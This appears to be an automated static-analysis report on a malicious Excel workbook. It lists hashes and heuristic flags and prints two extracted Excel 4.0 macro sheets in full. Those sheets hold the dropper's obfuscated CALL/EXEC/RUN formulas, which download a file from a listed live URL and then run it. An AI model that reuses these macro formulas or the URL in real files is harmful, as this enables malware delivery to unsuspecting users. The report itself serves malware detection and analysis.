Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 925fbe8236231803…

MALICIOUS

Office (OOXML)

527.6 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-02-09
MD5: a015f1fc52194c4335ddb22ec9b68c62 SHA-1: ebc952725958f70ac1a86be38c4df2f611543736 SHA-256: 925fbe8236231803a646943d7c0d8671bc631d0095de87030cf1c460055fd677
262 Risk Score

Heuristics 6

  • Excel 4.0 macro sheet (2 sheet(s)) critical 3 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: HALT, CALL, EXEC, RUN critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Binary XLM macro sheet with WinAPI/download strings critical OOXML_XLM_BINARY_WINAPI_STRINGS
    Excel 4.0 macro sheet is stored as BIFF12/XLSB binary data and contains Win32 download or process-execution API strings such as URLDownloadToFileA, ShellExecuteA, or CreateDirectoryA. These strings are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://netstation.store/img/superts.php In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 1400 bytes
SHA-256: 97c0a38b067b7bcdf25006ad4152a4f3d342849f2138e7a8c461771c97adea9d
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="FJ330:FK335"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.44140625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><sheetData><row r="330" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ330" s="1"/><c r="FK330" s="1"/></row><row r="331" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ331" s="1"/><c r="FK331" s="1"/></row><row r="332" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ332" s="1"/><c r="FK332" s="1"/></row><row r="333" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ333" s="1" t="b"><f>HALT()</f><v>1</v></c><c r="FK333" s="1"/></row><row r="334" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ334" s="1"/><c r="FK334" s="1"/></row><row r="335" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ335" s="1"/><c r="FK335" s="1"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 6311 bytes
SHA-256: 8c3ab64232e7a96fad94d6875391b2e5005c12f4027458afcd9112ec806360cd
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A11:AG52"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.44140625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><cols><col min="1" max="26" width="4.44140625" style="2"/><col min="27" max="27" width="4.44140625" style="2" customWidth="1"/><col min="28" max="16384" width="4.44140625" style="2"/></cols><sheetData><row r="11" spans="27:33" x14ac:dyDescent="0.3"><c r="AA11" s="1"/><c r="AB11" s="1"/><c r="AC11" s="1"/><c r="AD11" s="1"/><c r="AE11" s="1"/><c r="AF11" s="1"/><c r="AG11" s="1"/></row><row r="12" spans="27:33" x14ac:dyDescent="0.3"><c r="AA12" s="1"/><c r="AB12" s="1"/><c r="AC12" s="1"/><c r="AD12" s="1"/><c r="AE12" s="1"/><c r="AF12" s="1"/><c r="AG12" s="1"/></row><row r="13" spans="27:33" x14ac:dyDescent="0.3"><c r="AA13" s="1"/><c r="AB13" s="1"/><c r="AC13" s="1"/><c r="AD13" s="1"/><c r="AE13" s="1"/><c r="AF13" s="1"/><c r="AG13" s="1"/></row><row r="14" spans="27:33" x14ac:dyDescent="0.3"><c r="AA14" s="1"><f>CALL('Doc1'!AC16&amp;'Doc1'!AC17,'Doc1'!AD16&amp;'Doc1'!AD17,"JCJ",'Doc1'!AF16,0)</f><v>1</v></c><c r="AB14" s="1"/><c r="AC14" s="1"/><c r="AD14" s="1"/><c r="AE14" s="1"/><c r="AF14" s="1"/><c r="AG14" s="1"/></row><row r="15" spans="27:33" x14ac:dyDescent="0.3"><c r="AA15" s="1"><f>CALL('Doc1'!AC19&amp;'Doc1'!AC20,'Doc1'!AD19&amp;'Doc1'!AD20&amp;'Doc1'!AD21&amp;'Doc1'!AD22,'Doc1'!AE19&amp;'Doc1'!AE20,0,A50,'Doc1'!AF16&amp;'Doc1'!AF20,0,0)</f><v>0</v></c><c r="AB15" s="1"/><c r="AC15" s="1"/><c r="AD15" s="1"/><c r="AE15" s="1"/><c r="AF15" s="1"/><c r="AG15" s="1"/></row><row r="16" spans="27:33" x14ac:dyDescent="0.3"><c r="AA16" s="1" t="e"><f>CALL("INSENG","DownloadFile","BCCJ",A50,AF16&amp;AF20,1)</f><v>#NUM!</v></c><c r="AB16" s="1"/><c r="AC16" s="1" t="s"><v>0</v></c><c r="AD16" s="1" t="s"><v>2</v></c><c r="AE16" s="1" t="s"><v>4</v></c><c r="AF16" s="1" t="s"><v>5</v></c><c r="AG16" s="1"/></row><row r="17" spans="27:33" x14ac:dyDescent="0.3"><c r="AA17" s="1"><f>EXEC('Doc1'!AC24&amp;'Doc1'!AC25&amp;"C:\orwkw\kkfm.reo"&amp;'Doc1'!AD24&amp;'Doc1'!AD25)</f><v>33</v></c><c r="AB17" s="1"/><c r="AC17" s="1" t="s"><v>1</v></c><c r="AD17" s="1" t="s"><v>3</v></c><c r="AE17" s="1"/><c r="AF17" s="1"/><c r="AG17" s="1"/></row><row r="18" spans="27:33" x14ac:dyDescent="0.3"><c r="AA18" s="1" t="b"><f>RUN('Doc2'!FJ333)</f><v>0</v></c><c r="AB18" s="1"/><c r="AC18" s="1"/><c r="AD18" s="1"/><c r="AE18" s="1"/><c r="AF18" s="1"/><c r="AG18" s="1"/></row><row r="19" spans="27:33" x14ac:dyDescent="0.3"><c r="AA19" s="1"/><c r="AB19" s="1"/><c r="AC19" s="1" t="s"><v>6</v></c><c r="AD19" s="1" t="s"><v>6</v></c><c r="AE19" s="1" t="s"><v>9</v></c><c r="AF19" s="1"/><c r="AG19" s="1"/></row><row r="20" spans="27:33" x14ac:dyDescent="0.3"><c r="AA20" s="1"/><c r="AB20" s="1"/><c r="AC20" s="1" t="s"><v>15</v></c><c r="AD20" s="1" t="s"><v>16</v></c><c r="AE20" s="1" t="s"><v>10</v></c><c r="AF20" s="1" t="s"><v>17</v></c><c r="AG20" s="1"/></row><row r="21" spans="27:33" x14ac:dyDescent="0.3"><c r="AA21" s="1"/><c r="AB21" s="1"/><c r="AC21" s="1"/><c r="AD21" s="1" t="s"><v>7</v></c><c r="AE21" s="1"/><c r="AF21" s="1"/><c r="AG21" s="1"/></row><row r="22" spans="27:33" x14ac:dyDescent="0.3"><c r="AA22" s="1"/><c r="AB22" s="1"/><c r="AC22" s="1"/><c r="AD22" s="1" t="s"><v>8</v></c><c r="AE22" s="1"/><c r="AF22" s="1"/><c r="AG22" s="1"/></row><row r="23" spans="27:33" x14ac:dyDescent="0.3"><c r="AA23" s="1"/><c r="AB23" s="1"/><c r="AC23" s="1"/><c r="AD23" s="1"/><c r="AE23" s="1"/><c r="AF23" s="1"/><c r="AG23" s="1"/></row><row r="24" spans="27:33" x14ac:dyDescent="0.3"><c r="AA24" s="1"/><c r="AB24" s="1"/><c r="AC24" s="1" t="s"><v>11</v></c><c r="AD24" s="1" t="s"><v>13</v></c><c r="AE24" s="1"/><c r="AF24" s="1"/><c r="AG24" s="1"/></row><row r="25" spans="27:33" x14ac:dyDescent="0.3"><c r="AA25" s="1"/><c r="AB25" s="1"/><c r="AC25" s="1" t="s"><v>12</v></c><c r="AD25" s="1" t="s"><v>14</v></c><c r="AE25" s="1"/><c r="AF25" s="1"/><c r="AG25" s="1"/></row><row r="26" spans="27:33" x14ac:dyDescent="0.3"><c r="AA26" s="1"/><c r="AB26" s="1"/><c r="AC26" s="1"/><c r="AD26" s="1"/><c r="AE26" s="1"/><c r="AF26" s="1"/><c r="AG26" s="1"/></row><row r="27" spans="27:33" x14ac:dyDescent="0.3"><c r="AA27" s="1"/><c r="AB27" s="1"/><c r="AC27" s="1"/><c r="AD27" s="1"/><c r="AE27" s="1"/><c r="AF27" s="1"/><c r="AG27" s="1"/></row><row r="28" spans="27:33" x14ac:dyDescent="0.3"><c r="AA28" s="1"/><c r="AB28" s="1"/><c r="AC28" s="1"/><c r="AD28" s="1"/><c r="AE28" s="1"/><c r="AF28" s="1"/><c r="AG28" s="1"/></row><row r="29" spans="27:33" x14ac:dyDescent="0.3"><c r="AA29" s="1"/><c r="AB29" s="1"/><c r="AC29" s="1"/><c r="AD29" s="1"/><c r="AE29" s="1"/><c r="AF29" s="1"/><c r="AG29" s="1"/></row><row r="30" spans="27:33" x14ac:dyDescent="0.3"><c r="AA30" s="1"/><c r="AB30" s="1"/><c r="AC30" s="1"/><c r="AD30" s="1"/><c r="AE30" s="1"/><c r="AF30" s="1"/><c r="AG30" s="1"/></row><row r="31" spans="27:33" x14ac:dyDescent="0.3"><c r="AA31" s="1"/><c r="AB31" s="1"/><c r="AC31" s="1"/><c r="AD31" s="1"/><c r="AE31" s="1"/><c r="AF31" s="1"/><c r="AG31" s="1"/></row><row r="46" spans="1:1" x14ac:dyDescent="0.3"><c r="A46" s="1"/></row><row r="47" spans="1:1" x14ac:dyDescent="0.3"><c r="A47" s="1"/></row><row r="48" spans="1:1" x14ac:dyDescent="0.3"><c r="A48" s="1"/></row><row r="49" spans="1:1" x14ac:dyDescent="0.3"><c r="A49" s="1"/></row><row r="50" spans="1:1" x14ac:dyDescent="0.3"><c r="A50" s="1" t="s"><v>29</v></c></row><row r="51" spans="1:1" x14ac:dyDescent="0.3"><c r="A51" s="1"/></row><row r="52" spans="1:1" x14ac:dyDescent="0.3"><c r="A52" s="1"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>